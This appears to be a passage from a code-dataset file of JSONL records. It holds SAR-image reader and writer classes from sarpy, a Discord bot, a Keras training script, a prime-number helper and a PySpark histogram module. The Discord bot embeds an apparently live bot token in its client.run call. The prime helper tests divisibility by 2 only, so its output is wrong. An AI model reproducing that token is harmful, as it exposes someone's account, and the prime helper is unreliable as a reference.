numpy.ndarray\n the (mostly) raw data read from the file\n \"\"\"\n\n # Should generally begin as:\n # arange1, arange2 = self._reorder_arguments(range1, range2)\n\n raise NotImplementedError\n\n\nclass SubsetChipper(BaseChipper):\n \"\"\"\n Permits transparent extraction from a particular subset of the possible data range\n \"\"\"\n\n __slots__ = ('_data_size', '_complex_type', '_symmetry', 'shift1', 'shift2', 'parent_chipper')\n\n def __init__(self, parent_chipper, dim1bounds, dim2bounds):\n \"\"\"\n\n Parameters\n ----------\n parent_chipper : BaseChipper\n dim1bounds : numpy.ndarray|list|tuple\n dim2bounds: numpy.ndarray|list|tuple\n \"\"\"\n\n if not isinstance(parent_chipper, BaseChipper):\n raise TypeError('parent_chipper is required to be an instance of BaseChipper, '\n 'got type {}'.format(type(parent_chipper)))\n\n data_size = (dim1bounds[1] - dim1bounds[0], dim2bounds[1] - dim2bounds[0])\n self.shift1 = dim1bounds[0]\n self.shift2 = dim2bounds[0]\n self.parent_chipper = parent_chipper\n super(SubsetChipper, self).__init__(data_size, symmetry=(False, False, False), complex_type=False)\n\n def _reformat_bounds(self, range1, range2):\n def _get_start(entry, shift, bound):\n if entry is None:\n return shift\n entry = int_func(entry)\n if -bound < entry < 0:\n return shift + bound + entry\n elif 0 <= entry < bound:\n return shift + entry\n raise ValueError(\n 'Got slice start entry {}, which must be in the range '\n '({}, {})'.format(entry, -bound, bound))\n\n def _get_end(entry, shift, bound):\n if entry is None:\n return shift\n entry = int_func(entry)\n if -bound <= entry < 0:\n return shift + bound + entry\n elif 0 <= entry <= bound:\n return shift + entry\n raise ValueError(\n 'Got slice end entry {}, which must be in the range '\n '[{}, {}]'.format(entry, -bound, bound))\n\n def _get_range(rng, shift, bound):\n return (\n _get_start(rng[0], shift, bound),\n _get_end(rng[1], shift, bound),\n rng[2])\n arange1 = _get_range(range1, self.shift1, self._data_size[0])\n arange2 = _get_range(range2, self.shift2, 
self._data_size[1])\n return arange1, arange2\n\n def _read_raw_fun(self, range1, range2):\n arange1, arange2 = self._reformat_bounds(range1, range2)\n return self.parent_chipper.__call__(arange1, arange2)\n\n\nclass BaseReader(object):\n \"\"\"\n Abstract file reader class\n \"\"\"\n\n __slots__ = ('_sicd_meta', '_chipper', '_data_size')\n\n def __init__(self, sicd_meta, chipper):\n \"\"\"\n\n Parameters\n ----------\n sicd_meta : SICDType|Tuple[SICDType]\n the SICD metadata object, or tuple of objects\n chipper : BaseChipper|Tuple[BaseChipper]\n a chipper object, or tuple of chipper objects\n \"\"\"\n\n if isinstance(sicd_meta, list):\n sicd_meta = tuple(sicd_meta)\n if isinstance(chipper, list):\n chipper = tuple(chipper)\n\n if sicd_meta is None:\n pass\n elif isinstance(sicd_meta, tuple):\n for el in sicd_meta:\n if not isinstance(el, SICDType):\n raise TypeError(\n 'Got a collection for sicd_meta, and all elements are required '\n 'to be instances of SICDType.')\n elif not isinstance(sicd_meta, SICDType):\n raise TypeError('sicd_meta argument is required to be a SICDType, or collection of SICDType objects')\n\n if isinstance(chipper, tuple):\n for el in chipper:\n if not isinstance(el, BaseChipper):\n raise TypeError(\n 'Got a collection for chipper, and all elements are required '\n 'to be instances of BaseChipper.')\n elif not isinstance(chipper, BaseChipper):\n raise TypeError(\n 'chipper argument is required to be a BaseChipper instance, or collection of BaseChipper objects')\n\n data_size = None\n if isinstance(sicd_meta, SICDType):\n if not isinstance(chipper, BaseChipper):\n raise ValueError('sicd_meta is a single SICDType, so chipper must be a single BaseChipper')\n data_size = chipper.data_size\n elif isinstance(sicd_meta, tuple):\n if not (isinstance(chipper, tuple) and len(chipper) == len(sicd_meta)):\n raise ValueError('sicd_meta is a collection, so chipper must be a collection of the same size.')\n data_size = tuple(el.data_size for el in chipper)\n self._sicd_meta = sicd_meta\n self._chipper = chipper\n self._data_size = data_size\n\n @property\n def sicd_meta(self):\n \"\"\"\n SICDType|Tuple[SICDType]: the sicd meta_data or meta_data collection.\n \"\"\"\n\n return self._sicd_meta\n\n @property\n def data_size(self):\n \"\"\"\n Tuple[int, int]|Tuple[Tuple[int, int], ...]: the data size(s) of the form (rows, cols).\n \"\"\"\n\n return self._data_size\n\n def get_sicds_as_tuple(self):\n \"\"\"\n Get the sicd or sicd collection as a tuple - for simplicity and consistency of use.\n\n Returns\n -------\n Tuple[SICDType]\n \"\"\"\n\n if self._sicd_meta is None:\n return None\n elif isinstance(self._sicd_meta, tuple):\n return self._sicd_meta\n else:\n # noinspection PyRedundantParentheses\n return (self._sicd_meta, )\n\n def get_data_size_as_tuple(self):\n \"\"\"\n Get the data size wrapped in a tuple - for simplicity and ease of use.\n\n Returns\n -------\n Tuple[Tuple[int, int]]\n \"\"\"\n\n if self._sicd_meta is None:\n return None\n elif isinstance(self._sicd_meta, tuple):\n return self._data_size\n else:\n # noinspection PyRedundantParentheses\n return (self._data_size, )\n\n def _validate_index(self, index):\n if isinstance(self._chipper, BaseChipper) or index is None:\n return 0\n\n index = int(index)\n siz = len(self._chipper)\n if not (-siz < index < siz):\n raise ValueError('index must be in the range ({}, {})'.format(-siz, siz))\n return index\n\n def _validate_slice(self, item):\n if isinstance(item, tuple):\n if len(item) > 3:\n raise ValueError(\n 'Reader 
received slice argument {}. We cannot slice on more than '\n 'three dimensions.'.format(item))\n if len(item) == 3:\n index = item[2]\n if not isinstance(index, integer_types):\n raise ValueError('Cannot slice in multiple indices on the third dimension.')\n index = self._validate_index(index)\n return item[:2], index\n return item, 0\n\n def __call__(self, range1, range2, index=0):\n \"\"\"\n Reads and fetches data. Note that :code:`reader(range1, range2, index)` is an alias\n for :code:`reader.read_chip(range1, range2, index)`.\n\n Parameters\n ----------\n range1 : None|int|tuple\n range2 : None|int|tuple\n index : None|int\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n if isinstance(self._chipper, tuple):\n index = self._validate_index(index)\n return self._chipper[index](range1, range2)\n else:\n return self._chipper(range1, range2)\n\n def __getitem__(self, item):\n \"\"\"\n Reads and returns data using more traditional to python slice functionality.\n After slice interpretation, this is analogous to :func:`__call__` or :func:`read_chip`.\n\n Parameters\n ----------\n item : None|int|slice|tuple\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n item, index = self._validate_slice(item)\n if isinstance(self._chipper, tuple):\n return self._chipper[index].__getitem__(item)\n else:\n return self._chipper.__getitem__(item)\n\n def read_chip(self, dim1range, dim2range, index=None):\n \"\"\"\n Read the given section of data as an array.\n\n Parameters\n ----------\n dim1range : None|int|Tuple[int, int]|Tuple[int, int, int]\n The row data selection of the form `[start, [stop, [stride]]]`, and\n `None` defaults to all rows (i.e. `(0, NumRows, 1)`)\n dim2range : None|int|Tuple[int, int]|Tuple[int, int, int]\n The column data selection of the form `[start, [stop, [stride]]]`, and\n `None` defaults to all rows (i.e. `(0, NumCols, 1)`)\n index : int|None\n Relative to which sicd/chipper, and only used in the event of multiple\n sicd/chippers. Defaults to `0`, if not provided.\n\n Returns\n -------\n numpy.ndarray\n The complex data, explicitly of dtype=complex.64. Be sure to upcast to\n complex128 if so desired.\n\n Examples\n ------------\n :code:`data = reader.read_chip((start1, stop1, stride1), (start2, stop2, stride2))`\n\n Also available is basic call syntax\n\n .. code-block::\n\n data = reader(dim1range, dim2range, index).\n\n Another alternative is slice syntax\n\n .. 
code-block:: python\n\n data = reader[start1:stop1:stride1, start:stop:stride] # or\n data = reader[start:stop:stride, start:stop:stride, index]\n\n Here the slice on index (dimension 3) is limited to a single integer, and\n no slice on index :code:`reader[:, :]` will default to `index=0`,\n :code:`reader[:, :, 0]` (where appropriate).\n \"\"\"\n\n if isinstance(self._chipper, tuple):\n index = self._validate_index(index)\n return self._chipper[index](dim1range, dim2range)\n else:\n return self._chipper(dim1range, dim2range)\n\n def get_suggestive_name(self, frame=None):\n \"\"\"\n Get a suggestive name for the frame in question.\n\n Parameters\n ----------\n frame : None|int\n Defaults to the first frame.\n\n Returns\n -------\n str\n \"\"\"\n\n if frame is None:\n frame = 0\n else:\n frame = int_func(frame)\n the_sicd = self._sicd_meta if isinstance(self._sicd_meta, SICDType) else self._sicd_meta[frame]\n core_name = ''\n try:\n core_name += the_sicd.CollectionInfo.CoreName\n except (AttributeError, ValueError, TypeError):\n core_name = 'UnknownCoreName'\n\n pols = ''\n try:\n pols += re.sub(':', '', the_sicd.ImageFormation.TxRcvPolarizationProc)\n except (AttributeError, ValueError, TypeError):\n pols = 'UnknownPolarization'\n return '{}_{}_SICD.nitf'.format(core_name, pols)\n\n\nclass SubsetReader(BaseReader):\n \"\"\"Permits extraction from a particular subset of the possible data range\"\"\"\n __slots__ = ('_parent_reader', )\n\n def __init__(self, parent_reader, sicd_meta, dim1bounds, dim2bounds):\n \"\"\"\n\n Parameters\n ----------\n parent_reader : BaseReader\n sicd_meta : SICDType\n dim1bounds : tuple\n dim2bounds : tuple\n \"\"\"\n\n self._parent_reader = parent_reader\n # noinspection PyProtectedMember\n chipper = SubsetChipper(parent_reader._chipper, dim1bounds, dim2bounds)\n super(SubsetReader, self).__init__(sicd_meta, chipper)\n\n\nclass AbstractWriter(object):\n \"\"\"Abstract file writer class for SICD data\"\"\"\n __slots__ = ('_file_name', )\n\n def __init__(self, file_name):\n \"\"\"\n\n Parameters\n ----------\n file_name : str\n \"\"\"\n\n self._file_name = file_name\n if not os.path.exists(self._file_name):\n with open(self._file_name, 'wb') as fi:\n fi.write(b'')\n\n def close(self):\n \"\"\"\n Completes any necessary final steps.\n\n Returns\n -------\n None\n \"\"\"\n\n pass\n\n def write_chip(self, data, start_indices=(0, 0)):\n \"\"\"\n Write the data to the file(s). This is an alias to :code:`writer(data, start_indices)`.\n\n Parameters\n ----------\n data : numpy.ndarray\n the complex data\n start_indices : tuple[int, int]\n the starting index for the data.\n\n Returns\n -------\n None\n \"\"\"\n\n self.__call__(data, start_indices=start_indices)\n\n def __call__(self, data, start_indices=(0, 0)):\n \"\"\"\n Write the data to the file(s).\n\n Parameters\n ----------\n data : numpy.ndarray\n the complex data\n start_indices : Tuple[int, int]\n the starting index for the data.\n\n Returns\n -------\n None\n \"\"\"\n\n raise NotImplementedError\n\n def __del__(self):\n self.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n if exception_type is None:\n self.close()\n else:\n logging.error(\n 'The {} file writer generated an exception during processing. 
The file {} may be '\n 'only partially generated and corrupt.'.format(self.__class__.__name__, self._file_name))\n # The exception will be reraised.\n # It's unclear how any exception could be caught.\n\n\nclass BaseWriter(AbstractWriter):\n \"\"\"\n Abstract file writer class for SICD data\n \"\"\"\n\n __slots__ = ('_file_name', '_sicd_meta', )\n\n def __init__(self, file_name, sicd_meta):\n \"\"\"\n\n Parameters\n ----------\n file_name : str\n sicd_meta : SICDType\n \"\"\"\n\n super(BaseWriter, self).__init__(file_name)\n if not isinstance(sicd_meta, SICDType):\n raise ValueError('sicd_meta is required to be an instance of SICDType, got {}'.format(type(sicd_meta)))\n if sicd_meta.ImageData is None:\n raise ValueError('The sicd_meta has un-populated ImageData, and nothing useful can be inferred.')\n if sicd_meta.ImageData.NumCols is None or sicd_meta.ImageData.NumRows is None:\n raise ValueError('The sicd_meta has ImageData with unpopulated NumRows or NumCols, '\n 'and nothing useful can be inferred.')\n if sicd_meta.ImageData.PixelType is None:\n logging.warning('The PixelType for sicd_meta is unset, so defaulting to RE32F_IM32F.')\n sicd_meta.ImageData.PixelType = 'RE32F_IM32F'\n self._sicd_meta = sicd_meta.copy()\n\n profile = '{} {}'.format(__title__, __version__)\n if self._sicd_meta.ImageCreation is None:\n self._sicd_meta.ImageCreation = ImageCreationType(\n Application=profile,\n DateTime=numpy.datetime64('now', 'us'),\n Profile=profile)\n else:\n self._sicd_meta.ImageCreation.Profile = profile\n\n @property\n def sicd_meta(self):\n \"\"\"\n SICDType: the sicd metadata\n \"\"\"\n\n return self._sicd_meta\n\n def __call__(self, data, start_indices=(0, 0)):\n raise NotImplementedError\n","sub_path":"sarpy/io/complex/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":27979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"20438195","text":"import discord\r\nimport time\r\nimport os\r\nimport bosslist\r\nimport armod\r\nimport random\r\n\r\nfrom discord.ext import commands\r\n\r\nclient = commands.Bot(command_prefix = \".\")\r\n\r\n\r\nmaster = 100\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('bot is ready')\r\n'''\r\n@client.event\r\nasync def on_message(message):\r\n if message.author.id == client.user.id:\r\n return \r\n'''\r\n@client.command()\r\nasync def roll(ctx):\r\n await ctx.send(random.randint(0,6))\r\n\r\n@client.command()\r\nasync def ping(ctx):\r\n await ctx.send(f'Pong! 
{round(client.latency*1000)}ms')\r\n\r\n@client.command(aliases=['等下甚麼王','nextboss','boss'])\r\nasync def _boss(ctx):\r\n dayOfhour=int(time.strftime(\"%H\", time.localtime()))\r\n dayOfWeek=time.strftime(\"%a\", time.localtime())\r\n dayOfmin=int(time.strftime(\"%M\",time.localtime()))\r\n ans=bosslist.whichboss(dayOfWeek,dayOfhour,dayOfmin)\r\n print(dayOfWeek,dayOfhour,dayOfmin) \r\n standtime=ans.find(':')\r\n hourtime=int(ans[0:standtime])\r\n minstime=int(ans[standtime+1:standtime+3]) \r\n bosslist.distance(dayOfhour,dayOfmin,hourtime,minstime)\r\n h1=bosslist.distance(dayOfhour,dayOfmin,hourtime,minstime)[0]\r\n m1=bosslist.distance(dayOfhour,dayOfmin,hourtime,minstime)[1]\r\n \r\n await ctx.send(f'{ans}\\n 還有{h1}小時{m1}分')\r\n #\r\n \r\n@client.command()\r\nasync def ar(ctx,*,lear=None):\r\n if lear!=None: \r\n #學習\r\n await ctx.send(armod.learning(lear))\r\n else:\r\n text=armod.says() \r\n await ctx.send(text)\r\n\r\n@client.command(aliases=['OK還錢','夢夢還錢','告娃娃還錢','AR還錢','ar還錢'])\r\nasync def _i(ctx): \r\n await ctx.send(file=discord.File('C:\\disbot\\Vedlve0.jpg'))#傳圖片\r\n\r\n\r\nclient.run('NTc2NzY4NzMzNzU0ODE4NTcw.XRUBMA.C0ockwxUlZbRQj8z2oI562nzp5c')","sub_path":"tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326315120","text":"print(\"Importing librairies...\")\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\n\nfrom utilities import loaders\nfrom utilities import feature_extractors\nfrom utilities import tools\nfrom mixupgenerator.mixup_generator import MixupGenerator\nimport neural_networks\n\nprint(\"Done.\")\n\ntest_size = 0.20\nbatch_size = 50\nepochs = 5000\nalpha = 0.4\n\ni = 0\n\nprint(\"Loading dataset\")\n\nextractor = feature_extractors.raveller\nindices_generator, le = loaders.load_for_train_groups(test_size, extractor)\n\nprint(\"Done.\")\n\nkaggle_classification = int(input(\"Classification for Kaggle ? 
(1 or 0) : \"))\n\nif not kaggle_classification :\n print(\"\\n ▁▃▅▇ SPLIT {} ▇▅▃▁ \\n\".format(i))\n i += 1\n\n print(\"▶ Loading training data & preprocessing ◀\")\n X_train, y_train, X_test, y_test, lb = loaders.load_for_train_keras(test_size, extractor)\n\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n \n X_train = X_train.reshape((len(X_train), 1, 10, 128))\n X_test = X_test.reshape((len(X_test), 1, 10, 128))\n training_generator = MixupGenerator(X_train, y_train, batch_size=batch_size, alpha=alpha)()\n \n print(\"▶ Building the neural network ◀\")\n input_size = 1*128*10\n output_size = 9\n #classifier = neural_networks.basic(input_size, output_size)\n classifier = neural_networks.convolutional_VGGinspired(input_size, output_size)\n\n print(\"▶ Training ◀\")\n #classifier.fit(X_train, y_train, batch_size=batch_size, epochs=epochs)\n classifier.fit_generator(generator=training_generator, steps_per_epoch=X_train.shape[0] // batch_size, validation_data=(X_test, y_test), epochs=epochs, verbose=1)\n\n print(\"▶ Evaluating ◀\")\n y_pred = lb.inverse_transform(tools.max_one_hot(classifier.predict(X_test)), 0.5)\n y_test = lb.inverse_transform(y_test, 0.5)\n tools.accuracy_test(y_test, y_pred)\n tools.conf_matrix(y_test, y_pred)\nelse :\n print(\"▶ Loading training data & preprocessing ◀\")\n X, y, X_kaggle, lb = loaders.load_for_kaggle_keras(extractor)\n sc = StandardScaler()\n X = sc.fit_transform(X)\n X_kaggle = sc.transform(X_kaggle)\n \n X = X.reshape((len(X), 1, 10, 128))\n X_kaggle = X_kaggle.reshape((len(X_kaggle), 1, 10, 128))\n training_generator = MixupGenerator(X, y, batch_size=batch_size, alpha=alpha)()\n \n print(\"▶ Building the neural network ◀\")\n classifier = neural_networks.convolutional2D(1280, 9)\n\n print(\"▶ Training ◀\")\n classifier.fit_generator(generator=training_generator, steps_per_epoch=X.shape[0] // batch_size, epochs=epochs, verbose=1)\n\t\n print(\"▶ Evaluating Kaggle Data ◀\")\n y_pred = lb.inverse_transform(tools.max_one_hot(classifier.predict(X_kaggle)), 0.5)\n \n print(\"▶ Generating submission file ◀\")\n tools.CSVOutput(y_pred)\n","sub_path":"neural_network/classification_keras_VGGinspired.py","file_name":"classification_keras_VGGinspired.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121069745","text":"def ChkPrime(lst):\n arr = []\n for i in lst:\n isPrime = True\n for no in range(2,i):\n if i%2==0:\n isPrime = False\n break\n\n if isPrime:\n arr.append(i)\n print(\"Prime no are\",arr)\n print(\"Sum is\",sum(arr))\n","sub_path":"A5.5.2.py","file_name":"A5.5.2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383741785","text":"from scipy.interpolate import interp1d\n\ntry:\n from pyspark.sql.types import NumericType\n\n import pyspark.sql.functions as F\nexcept:\n pass\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\n\n\ndef hist(axis, x, overlapping=False, formatted_yaxis=True, **kwargs):\n \"\"\"Plots a histogram on an Axis object\n\n Args:\n :axis: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot.\n :x: (`DataFrame` or `list` of `DataFrame`)\n A DataFrame with one or more numerical columns, or a list of single numerical column DataFrames\n :overlapping: (`bool`, optional)\n Generate overlapping 
histograms.\n\n If set to true, this will generate an overlapping plot.\n When set to False it will generate a normal grouped histogram. Defaults to False.\n :formatted_yaxis: (`bool`, optional)\n If set to true, the numbers on the yaxis will be formatted\n for better readability. E.g. 1500000 will become 1.5M. Defaults to True\n\n :\\*\\*kwargs:\n The keyword arguments as used in matplotlib.pyplot.hist\n\n Returns:\n :n: (`array` or `list` of `arrays`)\n The values of the histogram bins. See normed and weights for a description of the possible semantics.\n If input x is an array, then this is an array of length nbins. If input is a sequence arrays\n [data1, data2,..], then this is a list of arrays with the values of the histograms for each of the\n arrays in the same order.\n :bins: (`array`)\n The edges of the bins.\n Length nbins + 1 (nbins left edges and right edge of last bin). Always a single array even\n when multiple data sets are passed in.\n :patches: (`list` or `list` of `lists`)\n Silent list of individual patches used to create the histogram or list of such lists if multiple\n input datasets.\n\n \"\"\"\n histogram = create_histogram_object(kwargs)\n histogram.add_data(x)\n return histogram.plot_hist(axis, overlapping, formatted_yaxis, **kwargs)\n\n\ndef distplot(axis, x, **kwargs):\n \"\"\"Plots a normalised histogram and a density plot on an Axes object\n\n Args:\n :axis: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot.\n :x: (`DataFrame` or `list` of `DataFrame`)\n A DataFrame with one or more numerical columns, or a list of single numerical column DataFrames\n :\\*\\*kwargs:\n The keyword arguments as used in matplotlib.pyplot.hist. Normed is set to True\n\n Returns:\n :n: (`array` or `list` of `arrays`)\n The values of the histogram bins. See normed and weights for a description of the possible semantics.\n If input x is an array, then this is an array of length nbins. If input is a sequence arrays\n [data1, data2,..], then this is a list of arrays with the values of the histograms for each of the\n arrays in the same order.\n :bins: (`array`)\n The edges of the bins.\n Length nbins + 1 (nbins left edges and right edge of last bin). Always a single array even\n when multiple data sets are passed in.\n :patches: (`list` or `list` of `lists`)\n Silent list of individual patches used to create the histogram or list of such lists if multiple\n input datasets.\n \"\"\"\n histogram = create_histogram_object(kwargs)\n histogram.add_data(x)\n n, bins, patches = histogram.plot_hist(axis, density=True, **kwargs)\n\n # If working with a list of DataFrames as input, patches will be a list of lists with Rectangle objects\n # We will get the color of the first Rectangle object. If there is only one DataFrame patches is a single list\n # Of Rectangle objects\n if type(x) == list and len(x) > 1:\n colors = [patch[0].get_facecolor() for patch in patches]\n elif type(patches[0]) is Rectangle:\n colors = [patches[0].get_facecolor()]\n else:\n raise TypeError(\"Unexpected Patch Type. 
Expected Rectangle\")\n\n histogram.plot_density(axis, color=colors)\n return n, bins, patches\n\n\ndef pandas_histogram(x, bins=10, range=None):\n \"\"\"Returns a pandas DataFrame with histograms of the Spark DataFrame\n\n Bin ranges are formatted as text an put on the Index.\n\n Args:\n :x: (`DataFrame` or `list` of `DataFrame`)\n A DataFrame with one or more numerical columns, or a list of single numerical column DataFrames\n :bins: (`integer` or `array_like`, optional)\n If an integer is given, bins + 1 bin edges are returned, consistently with numpy.histogram() for\n numpy version >= 1.3.\n\n Unequally spaced bins are supported if bins is a sequence.\n\n Default is 10\n :range: (tuple or None, optional)\n The lower and upper range of the bins. Lower and upper outliers are ignored.\n If not provided, range is (x.min(), x.max()). Range has no effect if bins is a sequence.\n\n If bins is a sequence or range is specified, autoscaling is based on the specified bin range instead\n of the range of x.\n\n Default is None\n \"\"\"\n histogram = Histogram(bins=bins, range=range)\n histogram.add_data(x)\n return histogram.to_pandas()\n\n\ndef create_histogram_object(kwargs):\n bins = 10\n b_range = None\n\n if 'bins' in kwargs:\n bins = kwargs['bins']\n del kwargs['bins']\n\n if 'range' in kwargs:\n b_range = kwargs['range']\n del kwargs['range']\n\n return Histogram(bins=bins, range=b_range)\n\n\nclass Histogram(object):\n \"\"\"The Histogram object leverages Spark to calculate histograms, and matplotlib to visualize these.\n\n Args:\n :range: (`tuple`, optional)\n The lower and upper range of the bins.\n\n Lower and upper outliers are ignored. If not provided, range is (min(x), max(x)). Range has no\n effect if bins is a sequence. If bins is a sequence or range is specified, autoscaling is\n based on the specified bin range instead of the range of x.\n :bins: (`int` or `list` of `str` or `list of `int`, optional)\n If an integer is given: Number of bins in the histogram.\n\n Defaults to 10.\n\n If a list is given: Predefined list of bin boundaries.\n\n The bins are all open to the right except for the last which is closed. e.g. 
[1,10,20,50] means\n the buckets are [1,10) [10,20) [20,50], which means 1<=x<10, 10<=x<20, 20<=x<=50.\n\n \"\"\"\n def __init__(self, bins=10, range=None):\n self.col_list = []\n self.bin_boundaries = []\n self.hist_dict = {} # column names: bin weight lists pairs\n self.nr_bins = None\n self.min_value = None\n self.max_value = None\n self.is_build = False\n\n if isinstance(bins, list):\n self.bin_boundaries = [float(bin_border) for bin_border in bins]\n else:\n self.nr_bins = bins\n\n if range is not None:\n self.min_value = range[0]\n self.max_value = range[1]\n\n def add_column(self, table):\n \"\"\"Add single column DataFrame to the histogram object.\n\n If multiple columns share the same name, a (n) will be appended to the name, where n is\n the next available number.\n\n Args:\n :table: (:obj:`dataframe`)\n A PySpark DataFrame with a single column\n\n \"\"\"\n if len(table.columns) > 1:\n raise ValueError('More then one column is being added, use add_data() to add multi-column DataFrames')\n\n column_name = table.columns[0]\n\n if not isinstance(table.schema.fields[0].dataType, NumericType):\n raise ValueError('Column %s has a non-numeric type (%s), only numeric types are supported'\n % (column_name, str(table.schema.fields[0].dataType)))\n\n self.col_list.append((table, column_name))\n\n def _get_bin_centers(self):\n result = []\n for i in range(len(self.bin_boundaries) - 1):\n result.append(((self.bin_boundaries[i + 1] - self.bin_boundaries[i]) / 2) + self.bin_boundaries[i])\n return result\n\n def _get_col_names(self):\n new_col_names = []\n for i in range(len(self.bin_boundaries) - 1):\n new_col_names.append('%.2f - %.2f' % (self.bin_boundaries[i], self.bin_boundaries[i + 1]))\n return new_col_names\n\n def _check_col_name(self, column_name):\n n = 0\n col_name_new = column_name\n while col_name_new in self.hist_dict.keys():\n n += 1\n col_name_new = '%s (%d)' % (column_name, n)\n return col_name_new\n\n def _get_min_value(self):\n if self.min_value is not None:\n return self.min_value\n return min([table.select(F.min(F.col(col_name))).collect()[0][0]\n for table, col_name in self.col_list])\n\n def _get_max_value(self):\n if self.max_value is not None:\n return self.max_value\n return max([table.select(F.max(F.col(col_name))).collect()[0][0]\n for table, col_name in self.col_list])\n\n def _calculate_bins(self):\n if len(self.bin_boundaries) > 0:\n return self.bin_boundaries\n\n if len(self.bin_boundaries) == 0 and len(self.col_list) == 1 \\\n and self.min_value is None and self.max_value is None:\n # Only use the amount of bins as input For the histogram function\n return self.nr_bins\n\n min_value = self._get_min_value()\n max_value = self._get_max_value()\n\n # expand empty range to avoid empty graph\n return Histogram._calc_n_bins_between(min_value, max_value, self.nr_bins)\n\n def _add_hist(self, table, column_name):\n \"\"\"Uses spark to calculate the hist values: for each column a list of weights, and if the bin_list is not set\n a set of bin boundaries\"\"\"\n bin_boundaries, bin_weights = table.select(column_name).rdd.flatMap(lambda x: x).histogram(self.bin_boundaries)\n self.hist_dict[self._check_col_name(column_name)] = bin_weights\n\n if isinstance(self.bin_boundaries, int): # the bin_list is not set\n if len(bin_boundaries) == 2 and bin_boundaries[0] == bin_boundaries[1]:\n # In case of a column with 1 unique value we need to calculate the histogram ourselves.\n min_value = bin_boundaries[0]\n max_value = bin_boundaries[1]\n self.bin_boundaries = 
self._calc_n_bins_between(min_value, max_value, self.nr_bins)\n self.hist_dict[column_name] = Histogram._calc_weights(self.bin_boundaries, min_value, bin_weights)\n else:\n self.bin_boundaries = bin_boundaries\n\n @staticmethod\n def _calc_n_bins_between(min_value, max_value, nr_bins):\n \"\"\"Returns a list of bin borders between min_value and max_value\"\"\"\n if min_value == max_value:\n min_value = min_value - 0.5\n max_value = max_value + 0.5\n step = (float(max_value) - float(min_value)) / nr_bins\n return [min_value + (step * float(bn_nr)) for bn_nr in range(nr_bins + 1)]\n\n @staticmethod\n def _calc_weights(bins, value, value_count):\n \"\"\"Calculate weights given a bin list, value within that bin list and a count\"\"\"\n # first we get a list of bin boundary tuples\n weights = list()\n bin_boundary_idx = [(idx, idx+2) for idx in range(len(bins)-1)]\n bin_boundaries = [tuple(bins[left_idx:right_idx]) for (left_idx, right_idx) in bin_boundary_idx]\n for left_boundary, right_boundary in bin_boundaries:\n if left_boundary <= value < right_boundary:\n weights.append(value_count[0])\n else:\n weights.append(0)\n return weights\n\n @staticmethod\n def _convert_number_bmk(axis_value, _):\n \"\"\"Converts the values on axes to Billions, Millions or Thousands\"\"\"\n if axis_value >= 1e9:\n return '{:1.1f}B'.format(axis_value * 1e-9)\n if axis_value >= 1e6:\n return '{:1.1f}M'.format(axis_value * 1e-6)\n if axis_value >= 1e3:\n return '{:1.1f}K'.format(axis_value * 1e-3)\n if axis_value >= 1 or axis_value == 0:\n return '{:1.0f}'.format(axis_value)\n return axis_value\n\n def build(self):\n \"\"\"Calculates the histogram values for each of the columns.\n\n If the Histogram has already been build, it doesn't build it again.\n \"\"\"\n if not self.is_build:\n self.bin_boundaries = self._calculate_bins()\n for table, column_name in self.col_list:\n self._add_hist(table, column_name)\n self.is_build = True\n\n def to_pandas(self, kind='hist'):\n \"\"\"Returns a pandas dataframe from the Histogram object.\n\n This function calculates the Histogram function in Spark if it was not done yet.\n\n Args:\n :kind: (:obj:`str`, optional):\n 'hist' or 'density'. When using hist this returns the histogram object\n as pandas dataframe. When using density the index contains the bin centers, and the values in the\n DataFrame are the scaled values. Defaults to 'hist'\n\n Returns:\n A pandas DataFrame from the Histogram object.\n \"\"\"\n self.build()\n if kind == 'hist':\n return pd.DataFrame(self.hist_dict).set_index([self._get_col_names()])\n elif kind == 'density':\n result = pd.DataFrame(self.hist_dict).set_index([self._get_bin_centers()])\n return result.apply(lambda x: x / x.max(), axis=0)\n\n def plot_hist(self, ax, overlapping=False, formatted_yaxis=True, **kwargs):\n \"\"\"Returns a matplotlib style histogram (matplotlib.pyplot.hist)\n\n Uses the matplotlib object oriented interface to add a Histogram to an matplotlib Axes object.\n All named arguments from pyplot.hist can be used. A new argument called \"type\" makes it possible to\n make overlapping histogram plots.\n\n Args:\n :ax: (`Axes`)\n An matplotlib Axes object on which the histogram will be plot\n :overlapping (`bool`, optional):\n If set to true, this will generate an overlapping plot.\n When set to False it will generate a normal grouped histogram. Defaults to False.\n :formatted_yaxis: (`bool`, optional).\n If set to true, the numbers on the yaxis will be formatted\n for better readability. E.g. 1500000 will become 1.5M. 
